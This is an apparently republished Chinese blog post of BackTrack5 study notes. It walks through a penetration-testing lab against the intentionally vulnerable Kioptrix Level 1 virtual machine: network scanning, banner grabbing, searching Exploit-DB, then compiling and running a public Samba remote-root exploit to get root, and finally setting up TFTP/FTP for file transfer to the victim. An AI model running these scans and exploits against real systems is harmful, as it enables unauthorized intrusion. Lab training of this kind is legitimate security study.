BackTrack5 学习笔记7 基于Kioptrix虚拟机的攻击实验1
来源:互联网 发布:合并pdf软件 编辑:程序博客网 时间:2024/06/05 14:34
一、 Kioptrix虚拟机
http://www.kioptrix.com/
下载Kioptrix VM Level1
添加为VirtualBox的虚拟机
把Kioptrix虚拟机作为靶机。
二、 实验过程
1. 列举服务
使用nmap对网络中的机器进行扫描。
nmap -f -n -P0 -v -p- -T4 192.168.75.0/24
该命令使用分包技术对网段上所有的IP的TCP端口进行扫描。
* 使用Unicornscan进行快速扫描*
cp /usr/share/GeoIP/GeoIP.data /usr/local/etc/unicornscan/ #BackTrack5 R1 中需要运行此命令apt-get install Unicornscanunicornscan -mT -r500 -I 192.168.75.0/24 # 每秒500个数据包的速度扫描网段所有TCP端口。unicornscan -mU -r500 -I 192.168.75.0/24 # 对UDP端口进行扫描
从上面命令返回结果,找到我们的目标靶机。
2. 完全扫描
利用Nmap进行完全扫描
nmap -n -sTUV -pT:22,80,111,139,443,32768,U:111,137,32768 192.168.75.14
获取目标主机开放端口,及目标上运行的服务。
3. 获取旗标
使用Netcat和Ncat获取旗标
nc 192.168,75.14 80HEAD / HTTP 1.1回车回车
获取目标主机操作系统版本、web容器版本等。
使用Ncat获取旗标
ncat 192.168.75.14 80HEAD / HTTP 1.1回车回车
使用smbclient获取旗标
smbclient - L 192.168.75.14 - N
利用smbclient工具可以通过139/TCP端口获得该服务的旗标。上面命令调用smbclient连接到目标主机,然后显示服务的信息。
- N 表示我们没有目标的root密码
扫描的结果如果有Samba版本,这个信息可以用来搜索针对这个服务有没有可能存在的漏洞。
4. 搜索Exploit-DB
在Exploit-DB.com上,可以找到已知漏洞的有用信息,以及验证其有效性的概念验证代码(POC)。通过使用概念验证代码,能确定目标软件版本是否存在漏洞。
搜索Samba版本2.2.1a的相关漏洞
1. 打开http://www.exploit-db.com
2. 单击search
3. 在Description 输入 Samba
4. Port 输入139
5. 单击Search
5. 离线的Exploit-DB
在BackTrack里包含了一份exploit-db.com数据库的拷贝。
cd /pentest/exploits/exploitdb./searchsploit samba
我们尝试 Samba 2.2.8 Remote Root Exploit - sambal.c
POC 路径在 /linux/remote/10.c ,这是个C语言程序。首先需要编译。
cp /pentest/exploits/exploitdb/platforms/linux/remote/10.c /root/10.ccd /rootvim 10.c# 这时会看到源代码里很多^M,用vim命令删除它们:%s/^M//g # 这是在vim里输入的命令,其中^是ctrl+v 后面的M是ctrl+Mgcc 10.c -o SambaVuln10
如无意外,编译是成功不了的。脚本有很多语法错误需要处理。 处理到最后还可能有程序错误。
代码完成修改,并成功编译后,会生成SambaVuln。
6. 运行漏洞利用程序
./SambaVuln10./SambaVuln10 -v -d 0 -S 192.168.75 # 程序的扫描模式./SambaVuln10 -b 0 -v 192.168.75.14
这时将会获得目标机器的root权限。
cd /ls #这时看到目标主机的目录列表whoamihostnamelastlog
三、 在受害机器上传和下载文件
1. 在BT5 安装和启动TFTP服务
apt-get install atftpdatftpd --daemon --port 69 --bind-address 192.168.75.12 /tmpnetstat - anu | grep 69
2. 安装和配置pure-ftpd
apt-get install pure-ftpdecho /etc/pure-ftpd/pureftpd.pdb > PureDBln -s /etc/pure-ftpd/conf/PureDB /etc/pure-ftpd/auth/50puregroupadd -g 7777 ftpzuseradd -u 7777 -s /bin/false -d /dev/null -c "pureFTP" -g ftpz Testerzmkdir /var/ftp /var/ftp/public /var/ftp/public/ftploginchown -R testerz:ftpz /var/ftp/public/ftploginpure-pw useradd ftplogin -u Testerz -d /var/ftp/public/ftploginpure-pw mkdbpure-pw show ftplogin/etc/init.d/pure-ftpd startftp 127.0.0.1
- BackTrack5 学习笔记7 基于Kioptrix虚拟机的攻击实验1
- BackTrack5 学习笔记1 安装
- BackTrack5 学习笔记三
- BackTrack5 学习笔记四
- BackTrack5 学习笔记2 常用工具
- BackTrack5 学习笔记6 SNMP
- BackTrack5 学习笔记9 Metasploit
- BackTrack5 学习笔记3 DNS 侦查
- BackTrack5 学习笔记4 WEB 应用指纹
- BackTrack5 学习笔记5 扫描 Nmap
- Kioptrix Level 1 渗透方案
- 基于Xen虚拟机的设计与实验
- 基于Xen虚拟机的设计与实验
- backtrack5虚拟机安装
- VMware虚拟机中Backtrack5 R2 NAT不能上网的解决办法
- 基于hunt工具的TCP会话劫持攻击实验
- BackTrack5 学习笔记8 密码暴力破解工具
- 实验吧 简单的SQL注入2攻击笔记
- setsockopt用法详解
- 解决数据库Can't connect to MySQL server on 'localhost' (10061)的问题
- html的标签
- Java8改进的HashMap和Hashtable实现类
- Java LinkedList
- BackTrack5 学习笔记7 基于Kioptrix虚拟机的攻击实验1
- Java Web开发——Servlet监听器
- Android控件CircleLayout
- C++执行Linux Bash命令
- Java websocket + redis 实现多人单聊天室,多人多聊天室, 一对一聊天
- dp day2-背包
- Python 文件操作
- WebService的工作原理及实例
- Caffe 在 win10 环境下配置